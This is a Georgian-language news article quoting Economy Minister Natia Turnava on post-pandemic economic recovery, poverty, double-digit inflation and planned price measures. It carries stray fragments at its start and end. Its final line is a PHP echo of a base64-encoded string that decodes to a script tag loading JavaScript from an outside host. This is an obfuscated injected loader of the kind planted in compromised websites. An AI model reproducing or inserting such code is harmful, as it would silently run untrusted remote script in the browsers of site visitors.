celsiusi
ავერსი შნაიდერი
ეკონომიკის მინისტრის ნათია თურნავას განცხადებით, საქართველოს მთავრობის წევრები არამხოლოდ ეკონომიკური ზრდის მაჩვენებელზე არამედ იმ პრობლემებზეც საუბრობენ, რომელიც ქვეყანაში არის. ამის შესახებ ნათია თურნავამ მთავრობის სხდომის შემდეგ ჟურნალისტის მიერ დასმული კითხვის საპასუხოდ განაცხადა, რომელიც ქვეყანაში ეკონომიკური ზრდის პარალელურად სიღარიბის მაღალ მაჩვენებელს და ორნიშნა ინფლაციას შეეხებოდა.
 
მინისტრმა განმარტა, რომ ეკონომიკური ზრდის მაჩვენებელი რეალურად 2020 წლის კლების აღდგენაა.
 
"ჩვენ ყოველთვის ვაცხადებთ, რომ გამოწვევები რჩება; როდესაც ჩვენ ვამბობთ, რომ ეკონომიკის ზრდა და გაჯანსაღება გვაქვს, ეს რეალურად აღდგენაა. 2020 წელის ძალიან მძიმე იყო და ახლა ეს ზრდა იმ ნეგატივის განეიტრალებას ემსახურება, რაც პანდემიამ მოიტანა. ეს ჩვეულებრივი ზრდა არ არის, ეს ზრდაა, რომელიც წინა წლის არსებულ ნეგატივს ანეიტრალებს და ამსუბუქებს, თუმცა ძალიან ბევრი გავქვს გასაკეთებელი, რომ სიღარიბე აღმოიფხვრას. ასევე ნომერ პირველი გამოწვევა ფასების ზრდაა.
 
ჩვენ ვსაუბრობთ იმაზე, თუ რითია გამოწვეული და როგორ უზრუნველვყოფთ, მომავალი წლის ბოლომდე რომ ინფლაცია თავის ნიშნულს 3-4%-ს დაუბრუნდეს. წინა პერიოდში ფასების ზრდა მოსახლეობისთვის არასდროს იყო ნომერ პირველი პრობლემა, იმიტომ რომ ბოლო 10 წელს თუ გადახედავთ 3-4%-ზე მეტი ფასების ზრდის დონე არ გვქონია. ერთადერთი განსხვავება, რაც 2020-2021 წელს არის პანდემიაა, რომელმაც მთელ მსოფლიოში და საქართველოში ფასების ზრდა გამოიწვია. ბოლო პერიოდში ეროვნულმა ბანკმა მნიშვნელოვანი ნაბიჯები გადადგა და მზად არის, რომ კიდევ გადადგას დამატებითი ნაბიჯები, მონეტარული პოლიტიკა გამკაცრებულია. მნიშვნელოვანია რომ ლარის კურსი არსებითად სტაბილურია და ეს დადებითად განგვასხვავებს სხვა ქვეყნებისგან, სადაც ინფლაციაც არის და ეროვნული ვალუტა უფასურდება. ცალკეული დარგები, როგორიც მედიკამენტებია, აქ იგეგმება საკანონმდებლო ცვლილებები რომ ერთხელ და სამუდამოდ მოგვარდეს ფასწარმოქმნა.
 
აქედან გამომდინარე, ჩვენ უპირატესად ვსაუბრობთ პრობლემებზე, თუმცა რაც შეეხება ეკონომიკურ ზრდას, ამას მე ან ჩვენი რომელიმე მთავრობის წევრი კი არ აცხადებს, ეს დამოუკიდებელი უტყუარი სტატისტიკაა, საერთაშორისო საფინანსო ინსტიტუტები და მათი შედარებაა. ამას როდესაც ვამბობთ, ეს არ არის მცდელობა რომ არ ვისაუბროთ პრობლემებზე, პირიქით გვაქვს ზრდა და გვაქვს პრობლემები. ეკონომიკური ზრდის პირობებში პრობლემებს უფრო მარტივად გადავლახავთ, უფრო მარტივად დავარეგულირებთ ფასებს და შევებრძოლებით სიღარიბეს; რომ არ გვქონოდა ეკონომიკური ზრდა მეტი პრობლემა გვექნებოდა“, - განაცხადა ნათია თურნავამ.
1031
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");